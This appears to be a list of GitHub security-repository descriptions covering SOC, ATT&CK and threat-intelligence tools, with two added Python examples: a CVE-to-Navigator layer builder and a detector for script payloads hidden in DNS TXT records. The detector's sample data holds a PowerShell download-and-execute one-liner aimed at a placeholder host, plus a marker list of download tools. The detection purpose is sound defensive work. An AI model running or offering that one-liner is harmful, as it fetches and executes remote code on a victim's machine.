A collection of sources of documentation, as well as field best practices, to build/run a SOC
A web application that assists network defenders, analysts, and researchers in the process of mapping adversary behaviors to the MITRE ATT&CK® framework.
MAAD Attack Framework - An attack tool for simple, fast & effective security testing of M365 & Entra ID (Azure AD).
Repository created to share information about tactics, techniques and procedures used by threat actors. Initially with ransomware groups and evolving to other types of threats.
Halberd: Multi-Cloud Attack Platform
This repository contains indicators of compromise (IOCs) of our various investigations.
This repository contains cutting-edge open-source security notes and tools that will help you during your Red Team assessments.
A collection of intelligence about Log4Shell and its exploitation activity.
A Python app to predict ATT&CK tactics and techniques from cyber threat reports
Generate a MITRE ATT&CK Navigator layer from a list of CVEs. The database of CVE, CWE, CAPEC, and MITRE ATT&CK technique data is updated daily.
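The core of a CVE-to-Navigator tool is the mapping step plus emitting the layer JSON that Navigator imports. The following is an added example, not the repository's own code, and it assumes a constructed CVE-to-technique mapping (`SAMPLE_CVE_MAP`, with placeholder `CVE-0000-*` IDs) in place of the project's database; the Navigator `versions` triple is also an assumption and should be set to whatever Navigator build you load the layer into. It scores each technique by how many of the input CVEs map to it and reports CVEs that have no mapping, which is the gap a practitioner most needs to see.

```python
import json
from collections import defaultdict

# Constructed illustrative mapping, not the project's database: CVE -> ATT&CK technique IDs.
# The Log4Shell entry is an illustrative mapping; the CVE-0000-* IDs are placeholders.
SAMPLE_CVE_MAP = {
    "CVE-2021-44228": ["T1190", "T1059"],
    "CVE-0000-0001": ["T1190"],
    "CVE-0000-0002": [],  # constructed: a CVE with no technique mapping available
}

# Assumed Navigator/ATT&CK versions; adjust to the Navigator instance that will import the layer.
NAVIGATOR_VERSIONS = {"attack": "14", "navigator": "4.9.1", "layer": "4.5"}


def build_layer(cves, cve_map, name="CVE coverage"):
    """Return (navigator_layer_dict, unmapped_cves).

    Each technique's score is the number of input CVEs that map to it, and the
    comment lists those CVEs so the analyst can trace a cell back to its source.
    """
    hits = defaultdict(list)
    unmapped = []
    for cve in cves:
        techniques = cve_map.get(cve, [])
        if not techniques:
            unmapped.append(cve)
            continue
        for technique_id in techniques:
            hits[technique_id].append(cve)

    max_score = max((len(v) for v in hits.values()), default=1)
    techniques = [
        {
            "techniqueID": technique_id,
            "score": len(sources),
            "comment": ", ".join(sorted(sources)),
        }
        for technique_id, sources in sorted(hits.items())
    ]
    layer = {
        "name": name,
        "versions": NAVIGATOR_VERSIONS,
        "domain": "enterprise-attack",
        "description": f"{len(cves) - len(unmapped)} of {len(cves)} CVEs mapped to techniques",
        # Gradient scales cell colour by score so heavily-hit techniques stand out.
        "gradient": {"colors": ["#ffffff", "#ff6666"], "minValue": 0, "maxValue": max_score},
        "techniques": techniques,
    }
    return layer, unmapped


def layer_json(layer):
    """Serialize the layer in the JSON form Navigator's 'Open Existing Layer' accepts."""
    return json.dumps(layer, indent=2)


if __name__ == "__main__":
    layer, unmapped = build_layer(list(SAMPLE_CVE_MAP), SAMPLE_CVE_MAP)
    print(layer_json(layer))
    print("unmapped:", unmapped)
```

Write the output to a `.json` file and load it via Navigator's "Open Existing Layer"; the unmapped list is worth surfacing separately, since a CVE that disappears silently from the heatmap is the kind of blind spot this sort of tool exists to remove.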
PoC showcasing new DarkGate Install Script retrieval technique via DNS TXT Record
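Fetching an install script through a DNS TXT answer is attractive to an attacker because the payload rides a channel most egress filters never inspect. The detection side, as an added example that is not the PoC's code: scan DNS logs for TXT answers that are long base64 blobs decoding to script-like text. The log format (tab-separated `ts`, `client`, `qname`, `qtype`, `answer`), the hostnames and the marker list are all constructed assumptions; the sample "malicious" record is generated inline so the example runs offline.

```python
import base64
import binascii
import re

# Constructed sample script that a stager might pull down; used only to build the sample log.
SAMPLE_SCRIPT = (
    "powershell.exe -nop -w hidden -c "
    "\"iex (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')\""
)

# Constructed DNS log (tab-separated: ts, client, qname, qtype, answer). Not real telemetry.
SAMPLE_DNS_LOG = "\n".join([
    "1700000000.1\t10.0.0.5\twww.example.com\tA\t93.184.216.34",
    "1700000000.2\t10.0.0.5\texample.com\tTXT\tv=spf1 include:_spf.example.com ~all",
    "1700000000.3\t10.0.0.5\tupd.example.test\tTXT\t"
    + base64.b64encode(SAMPLE_SCRIPT.encode()).decode(),
])

# Substrings that indicate a decoded TXT payload is a script rather than an SPF/DKIM/verification record.
SCRIPT_MARKERS = ("powershell", "cmd.exe", "iex", "downloadstring",
                  "curl ", "wget ", "http://", "https://")

# Legitimate TXT records are rarely pure base64 of this length; SPF/DKIM contain spaces, ':' or ';'.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def decode_txt_payload(txt):
    """Return the decoded text if `txt` is a long, valid base64 blob of printable text, else None."""
    if not B64_RE.match(txt):
        return None
    try:
        raw = base64.b64decode(txt, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def analyze_dns_log(log_text):
    """Yield one alert dict per TXT answer whose decoded payload looks like a script."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype, answer = line.split("\t", 4)
        if qtype != "TXT":
            continue
        decoded = decode_txt_payload(answer)
        if decoded is None:
            continue
        lowered = decoded.lower()
        markers = [m for m in SCRIPT_MARKERS if m in lowered]
        if markers:
            alerts.append({
                "ts": ts,
                "client": client,
                "qname": qname,
                "markers": markers,
                "preview": decoded[:60],
            })
    return alerts


if __name__ == "__main__":
    for alert in analyze_dns_log(SAMPLE_DNS_LOG):
        print(alert)
```

Real loaders often split a payload across several TXT strings or records and may use a custom alphabet rather than standard base64, so in production you would concatenate the strings of one answer before decoding and add a size-based rule (total TXT bytes per client per hour) that fires even when the decode fails.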
Adversary emulation for EDR/SIEM testing (macOS/Linux)
This central repository is crafted for cybersecurity enthusiasts, researchers, and professionals aiming to advance their skills. It offers valuable resources for those focused on analyzing and underst...
A collection of commands, tools, techniques and procedures of the purplestorm ctf team.
Parsing some Nokia SR OS show command outputs using TTP (Template Text Parser)
Use the Prowl API to obtain IP reputation, Tactics, Techniques and Procedures, Indicators of Attack and Indicators of Compromise related to a public IP.